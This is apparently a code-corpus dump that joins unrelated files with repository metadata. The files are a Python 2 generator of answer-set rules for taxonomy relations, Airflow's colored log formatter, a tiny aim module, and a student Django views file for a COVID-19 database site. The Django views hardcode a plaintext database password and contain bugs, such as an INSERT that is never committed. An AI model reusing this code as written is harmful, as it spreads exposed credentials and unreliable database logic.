"c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"\
"pie($r, prod(A, B), 2) :- vr(X, A), in($x, X), in($y, X), vr(Y, B), out("+ name2 + ",Y), in($x,Y), ix.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), out($y, X), ix.\n\n"
rule[rcc5["includes"] | rcc5["overlaps"]] =\
"vrs(X) v irs(X) :- out($x,X), in($y,X), pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"
rule[rcc5["includes"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} > 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} > 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n\n"\
"pie($r, prod(A, B), 2) :- vr(X, A), in($x, X), in($y, X), vr(Y, B), in("+ name2 + ",Y), out($x,Y), ix.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"\
"c($r, A, 3) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["equals"]] =\
"vr(X, $r) v ir(X, $r) :- out($x,X), in($y,X).\n"\
"vr(X, $r) v ir(X, $r) :- in($x,X), out($y,X).\n"\
":- #count{X: vrs(X), in($x,X), out($y, X)} > 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["is_included_in"] | rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y, X)} > 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y, X)} = 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["equals"] | rcc5["includes"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), out($x, X), in($y, X)} = 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), out($x, X), in($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), out($x, X), in($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} = 0, #count{Z: vrs(Z), in($x, Z), out($y, Z)} = 0.\n\n"
rule[rcc5["equals"] | rcc5["is_included_in"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0, #count{Y:vrs(Y), in($x, Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0, #count{Y:vrs(Y), in($x, Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0, #count{Y:vrs(Y), in($x, Y), in($y, Y)} = 0, #count{Z: vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y, X)} = 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} = 0, #count{Z: vrs(Z), in($x,Z), in($y, Z)} > 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["disjoint"] | rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} > 0, #count{Y : vrs(Y), out($x, Y ), in($y, Y )} = 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), out($x, Y ), in($y, Y )} > 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), in($x, Y ), in($y, Y )} = 0, #count{Z : vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["disjoint"] | rcc5["is_included_in"] | rcc5["overlaps"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y: vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0, #count{Z: vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["disjoint"] | rcc5["overlaps"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), in($x, Y), in($y, Y)} > 0, #count{Z : vrs(Z), out($x, Z), in($y, Z)} > 0.\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0, #count{Y: vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0, #count{Z : vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["overlaps"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} = 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["disjoint"] | rcc5["is_included_in"] | rcc5["overlaps"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["disjoint"] | rcc5["overlaps"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["disjoint"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["overlaps"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0,"\
"#count{Y: vrs(Y), out($x, Y), in($y, Y)} = 0.\n\n"
rule[relation["+="]] =\ # lsum
":- #count{X: vrs(X), out($x,X), in($z,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($z,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($y,X), in($z,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($y,X), in($z,X)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), out($x, X), in($z, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($z, X), ix.\n\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($z, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($z, X), ix.\n\n"\
"pie($r, A, 3) :- ir(X, A), out($y, X), in($z, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), out($y, X), in($z, X), ix.\n\n"\
"pie($r, A, 4) :- ir(X, A), in($y, X), in($z, X), ix.\n"\
"c($r, A, 4) :- vr(X, A), in($y, X), in($z, X), ix.\n\n"\
"ir(X, $r) :- in($x,X), out($z,X), pw.\n"\
"ir(X, $r) :- in($y,X), out($z,X), pw.\n"
elif self.relations == relation["=-"]: # rdiff
name3 = self.taxon3.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($x,X), in($y,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($x,X), in($y,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($y,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($y,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($x,X): in($y,X)]0.\n"
result += ":- [vrs(X): in($x,X): in($y,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($y,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($y,X)]0.\n"
result += "pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"
result += "c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"
result += "pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"
result += "c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
result += "pie($r, A, 3) :- ir(X, A), out($z, X), in($y, X), ix.\n"
result += "c($r, A, 3) :- vr(X, A), out($z, X), in($y, X), ix.\n\n"
result += "pie($r, A, 4) :- ir(X, A), in($z, X), in($y, X), ix.\n"
result += "c($r, A, 4) :- vr(X, A), in($z, X), in($y, X), ix.\n\n"
result += "ir(X, $r) :- in($x,X), out($y,X).\n"
result += "ir(X, $r) :- in($z,X), out($y,X).\n"
elif self.relations == relation["+3="]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($x,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($x,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($y,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in(" + name4 + ",X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($x,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): in($x,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): out($y,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): in($y,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): out($z,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): in($z,X): in(" + name4 + ",X)]0.\n"
result += "ir(X, $r) :- in($x,X), out(" + name4 + ",X).\n"
result += "ir(X, $r) :- in($y,X), out(" + name4 + ",X).\n"
result += "ir(X, $r) :- in($z,X), out(" + name4 + ",X).\n"
result += "ir(X, $r) :- out(" +name1 + ",X), out($y,X),\
out($z,X), in(" + name4 + ",X).\n"
elif self.relations == relation["+4="]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
name5 = self.taxon5.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($x,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($x,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($y,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name4 + ",X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name4 + ",X), in(" + name5 + ",X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($x,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in($x,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): out($y,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in($y,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): out($z,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in($z,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): out(" + name4 + ",X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in(" + name4 + ",X): in(" + name5 + ",X)]0.\n"
result += "ir(X, $r) :- in($x,X), out(" + name5 + ",X).\n"
result += "ir(X, $r) :- in($y,X), out(" + name5 + ",X).\n"
result += "ir(X, $r) :- in($z,X), out(" + name5 + ",X).\n"
result += "ir(X, $r) :- in(" + name4 + ",X), out(" + name5 + ",X).\n"
elif self.relations == relation["=+"] or self.relations == relation["-="]: # rsum and ldiff
name3 = self.taxon3.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($x,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($x,X)]0.\n"
result += "ir(X, $r) :- in($y,X), out($x,X).\n"
result += "ir(X, $r) :- in($z,X), out($x,X).\n"
elif self.relations == relation["=3+"]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name4 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name4 + ",X), in($x,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): out(" + name4 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): in(" + name4 + ",X): in($x,X)]0.\n"
result += "ir(X, $r) :- in($y,X), out($x,X).\n"
result += "ir(X, $r) :- in($z,X), out($x,X).\n"
result += "ir(X, $r) :- in(" + name4 + ",X), out($x,X).\n"
elif self.relations == relation["=4+"]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
name5 = self.taxon5.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name4 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name4 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name5 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name5 + ",X), in($x,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): out(" + name4 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): in(" + name4 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): out(" + name5 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): in(" + name5 + ",X): in($x,X)]0.\n"
result += "ir(X, $r) :- in($y,X), out($x,X).\n"
result += "ir(X, $r) :- in($z,X), out($x,X).\n"
result += "ir(X, $r) :- in(" + name4 + ",X), out($x,X).\n"
result += "ir(X, $r) :- in(" + name5 + ",X), out($x,X).\n"
else:
print "Relation ",self.relations," is not yet supported!!!!"
result = "\n"
elif encode[enc] & encode["direct"]:
prefix = "label($x, " + name2 +", "
result = ""
firstrel = True
if self.relations < relation["+="]:
if self.relations & rcc5["includes"] == rcc5["includes"]:
result = prefix + "in) "
firstrel = False
if self.relations & rcc5["is_included_in"] == rcc5["is_included_in"]:
if firstrel:
result = prefix + "ls) "
firstrel = False
else:
result += " v " + prefix + "ls) "
if self.relations & rcc5["overlaps"] == rcc5["overlaps"]:
if firstrel:
result = prefix + "ol) "
firstrel = False
else:
result += " v " + prefix + "ol) "
if self.relations & rcc5["disjoint"] == rcc5["disjoint"]:
if firstrel:
result = prefix + "ds) "
firstrel = False
else:
result += " v " + prefix + "ds) "
if self.relations & rcc5["equals"] == rcc5["equals"]:
if firstrel:
result = prefix + "eq) "
firstrel = False
else:
result += " v " + prefix + "eq) "
if not firstrel:
result += "."
elif self.relations == relation["+="]:
result = "sum(" + self.taxon3.dlvName() + ",$x,$y).\n"
elif self.relations == relation["=+"]:
result = "sum($x,$y," + self.taxon3.dlvName() + ").\n"
else:
raise Exception("Encoding:", enc, " is not supported !!")
return result
| 61.876984
| 169
| 0.415218
|
29a9a0f33428b7947202d40d46a5d24d1439afc7
| 3,032
|
py
|
Python
|
airflow/utils/log/colored_log.py
|
Ryan-Miao/airflow
|
a2aca8714fac014ed7da97229d7877f1bc6e5a59
|
[
"Apache-2.0"
] | 2
|
2020-10-12T05:21:27.000Z
|
2021-07-07T09:23:47.000Z
|
airflow/utils/log/colored_log.py
|
Ryan-Miao/airflow
|
a2aca8714fac014ed7da97229d7877f1bc6e5a59
|
[
"Apache-2.0"
] | 3
|
2021-03-11T06:46:16.000Z
|
2021-09-29T17:48:20.000Z
|
airflow/utils/log/colored_log.py
|
Ryan-Miao/airflow
|
a2aca8714fac014ed7da97229d7877f1bc6e5a59
|
[
"Apache-2.0"
] | 1
|
2019-12-09T08:41:32.000Z
|
2019-12-09T08:41:32.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Class responsible for colouring logs based on log level.
"""
import sys
from typing import Any, Union
from logging import LogRecord
from colorlog import TTYColoredFormatter
from termcolor import colored
ARGS = {"attrs": ["bold"]}
DEFAULT_COLORS = {
"DEBUG": "red",
"INFO": "",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red",
}
class CustomTTYColoredFormatter(TTYColoredFormatter):
"""
Custom log formatter which extends `colored.TTYColoredFormatter`
by adding attributes to message arguments and coloring error
traceback.
"""
def __init__(self, *args, **kwargs):
kwargs["stream"] = sys.stdout or kwargs.get("stream")
kwargs["log_colors"] = DEFAULT_COLORS
super().__init__(*args, **kwargs)
@staticmethod
def _color_arg(arg: Any) -> Union[str, float, int]:
if isinstance(arg, (int, float)):
# In case of %d or %f formatting
return arg
return colored(str(arg), **ARGS) # type: ignore
def _color_record_args(self, record: LogRecord) -> LogRecord:
if isinstance(record.args, (tuple, list)):
record.args = tuple(self._color_arg(arg) for arg in record.args)
elif isinstance(record.args, dict):
# Case of logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
record.args = {
key: self._color_arg(value) for key, value in record.args.items()
}
elif isinstance(record.args, str):
record.args = self._color_arg(record.args)
return record
def _color_record_traceback(self, record: LogRecord) -> LogRecord:
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
record.exc_text = colored(record.exc_text, DEFAULT_COLORS["ERROR"])
return record
def format(self, record: LogRecord) -> str:
record = self._color_record_args(record)
record = self._color_record_traceback(record)
return super().format(record)
| 35.670588
| 83
| 0.661939
|
fe5093485bde89aced3aa481dd4f347f672ee9f9
| 45
|
py
|
Python
|
aim/sdk/types.py
|
avkudr/aim
|
5961f31d358929287986ace09c73310886a94704
|
[
"Apache-2.0"
] | 2,195
|
2020-01-23T03:08:11.000Z
|
2022-03-31T14:32:19.000Z
|
aim/sdk/types.py
|
deepanprabhu/aim
|
c00d8ec7bb2d9fd230a9430b516ca90cdb8072cb
|
[
"Apache-2.0"
] | 696
|
2020-02-08T21:55:45.000Z
|
2022-03-31T16:52:22.000Z
|
aim/sdk/types.py
|
deepanprabhu/aim
|
c00d8ec7bb2d9fd230a9430b516ca90cdb8072cb
|
[
"Apache-2.0"
] | 150
|
2020-03-27T10:44:25.000Z
|
2022-03-21T21:29:41.000Z
|
from aim.storage.types import * # noqa F401
| 22.5
| 44
| 0.733333
|
29e52b7a03150a104462d917259c77ab4b997841
| 34,234
|
py
|
Python
|
travello/views.py
|
KaushikAlwala/COVID-19---a-DBMS-approach
|
66af73c92bd33d134d4353e0e1e34ab165e1529b
|
[
"CC-BY-3.0"
] | null | null | null |
travello/views.py
|
KaushikAlwala/COVID-19---a-DBMS-approach
|
66af73c92bd33d134d4353e0e1e34ab165e1529b
|
[
"CC-BY-3.0"
] | null | null | null |
travello/views.py
|
KaushikAlwala/COVID-19---a-DBMS-approach
|
66af73c92bd33d134d4353e0e1e34ab165e1529b
|
[
"CC-BY-3.0"
] | null | null | null |
from django.shortcuts import render
from .models import Destination
from .models import Daily_cases
from .models import people
from .models import people3
from .models import victims
from .models import Travel_history
import psycopg2
# Create your views here.
def index(request):
return render(request, 'index.html')
def homepage(request):
return render(request, 'index.html')
def doneby(request):
return render(request, 'doneby.html')
def link_1(request):
return render(request, 'link_1.html')
def link_2(request):
return render(request, 'link_2.html')
def link_3(request):
return render(request, 'link_3.html')
def link_4(request):
return render(request, 'link_4.html')
def link_5(request):
return render(request, 'link_5.html')
def link_6(request):
return render(request, 'link_6.html')
def link_7(request):
return render(request, 'link_7.html')
def link_8(request):
return render(request, 'link_8.html')
def link_9(request):
return render(request, 'link_9.html')
def link_10(request):
return render(request, 'link_10.html')
def link_11(request):
return render(request, 'link_11.html')
def link_12(request):
return render(request, 'link_12.html')
def link_13(request):
return render(request, 'link_13.html')
def link_14(request):
return render(request, 'link_14.html')
def link_15(request):
return render(request, 'link_15.html')
def your_options(request):
if (request.POST["option"]=="Cases_in_different_countries"):
return render(request, 'cases.html')
if (request.POST["option"]=="else"):
return render(request, 'Graphs.html')
def cases_results(request):
country_name = request.POST["s"]
date_entered = request.POST["date"]
desired_country=Daily_cases()
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT id, date, iso_code, location, new_cases, new_deaths, total_cases, total_deaths from travello_daily_cases where location= %s and date= %s ",(country_name , date_entered))
name = cur.fetchall()
desired_country.id = name[0][0]
desired_country.date = name[0][1]
desired_country.iso_code = name[0][2]
desired_country.location = name[0][3]
desired_country.new_cases = name[0][4]
desired_country.new_deaths = name[0][5]
desired_country.total_cases = name[0][6]
desired_country.total_deaths = name[0][7]
return render(request, 'cases_results.html',{'desired_country':desired_country})
def graph_options(request):
if (request.POST["option"]=="Belgium"):
gopt = "Belgium"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Brazil"):
gopt = "Brazil"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Canada"):
gopt = "Canada"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Chile"):
gopt = "Chile"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="China"):
gopt = "China"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="France"):
gopt = "France"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Germany"):
gopt = "Germany"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="India"):
gopt = "India"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Iran"):
gopt = "Iran"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Italy"):
gopt = "Italy"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Mexico"):
gopt = "Mexico"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Pakistan"):
gopt = "Pakistan"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Peru"):
gopt = "Peru"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Qatar"):
gopt = "Qatar"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Russia"):
gopt = "Russia"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Saudi_Arabia"):
gopt = "Saudi_Arabia"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Spain"):
gopt = "Spain"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Turkey"):
gopt = "Turkey"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="UK"):
gopt = "UK"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="USA"):
gopt = "USA"
return render(request, 'graph_results.html',{'gopt':gopt})
def MDU_options(request):
if (request.POST["option"]=="Travel_history"):
return render(request, 'Travel_history.html')
if (request.POST["option"]=="PD"):
return render(request, 'PD.html')
if (request.POST["option"]=="QC"):
return render(request, 'Quarantine_centres.html')
if (request.POST["option"]=="VC"):
return render(request, 'VC.html')
if (request.POST["option"]=="Vulnerability"):
return render(request, 'Vulnerability.html')
if (request.POST["option"]=="I"):
return render(request, 'I.html')
def I_results(request):
victim = request.POST["v"]
center = request.POST["c"]
date = request.POST["a"]
v = victims.objects.all()
flag =0
for q in v:
if q.victim_id == victim:
flag = 1
return render(request, 'A.html')
count = 0
for q in v:
count = count + 1
x = int(count+1)
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("INSERT INTO public.travello_victims(id, victim_id, centre_id, admit_date) VALUES (%s, %s, %s, %s) ",(x,victim,center,date,))
return render(request, 'I_results.html')
def PD_results(request):
person = request.POST["x"]
desired_person = people3()
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_people3.id, national_id, name, phone_number, age, address, Ischemic_heart_disease, Stroke, Bronchitis, HIV_AIDS, COPD, Diabetes_mellitus, Kidney_Disease FROM travello_people3, travello_medical_history WHERE national_id= %s",(person,))
name = cur.fetchall()
desired_person.id = int(name[0][1])
desired_person.national_id = name[0][1]
desired_person.name = str(name[0][2])
desired_person.phone_number = str(name[0][3])
desired_person.age = str(name[0][4])
desired_person.address = str(name[0][5])
st = "This person is suffering from : "
di = ["Ischemic Heart disease", "Stroke" , "Bronchitis" , "HIV-AIDS" , "COPD", "Diabetes Mellitus" , "Kidney Disease"]
for i in [6, 7, 8, 9, 10, 11, 12]:
if name[0][i] == "Positive":
st = st + str(di[i-6]) + " , "
desired_person.national_id = st
return render(request, 'PD_results.html',{'desired_person':desired_person})
def QC_results(request):
centre = request.POST["s"]
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT centre_name, address FROM travello_quarantine_centres WHERE centre_id= %s",(centre,))
name = cur.fetchall()
stri = "Centre Name :" + str(name[0][0]) +" , " + "Address : " + str(name[0][1]) + ". The ID's of the victims in this centre are : "
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT victim_id FROM travello_victims WHERE centre_id= %s",(centre,))
y = cur.fetchall()
for i in range(0,len(y)-1):
stri = stri + " , " + str(y[i][0])
return render(request, 'QC_results.html',{'stri':stri})
def VC_results(request):
person = request.POST["s"]
y = victims.objects.all()
flag = 0
for z in y:
if z.victim_id == person:
d=z
flag = 1
if(flag==1):
stri = "This person is infected with COVID19 on " + str(d.admit_date) + " . He is currently at the Quarantine centre with ID : " + str(d.centre_id)
else:
stri = "This person is not infected with COVID19"
return render(request, 'QC_results.html',{'stri':stri})
def TH_results(request):
person = request.POST["s"]
date = request.POST["option"]
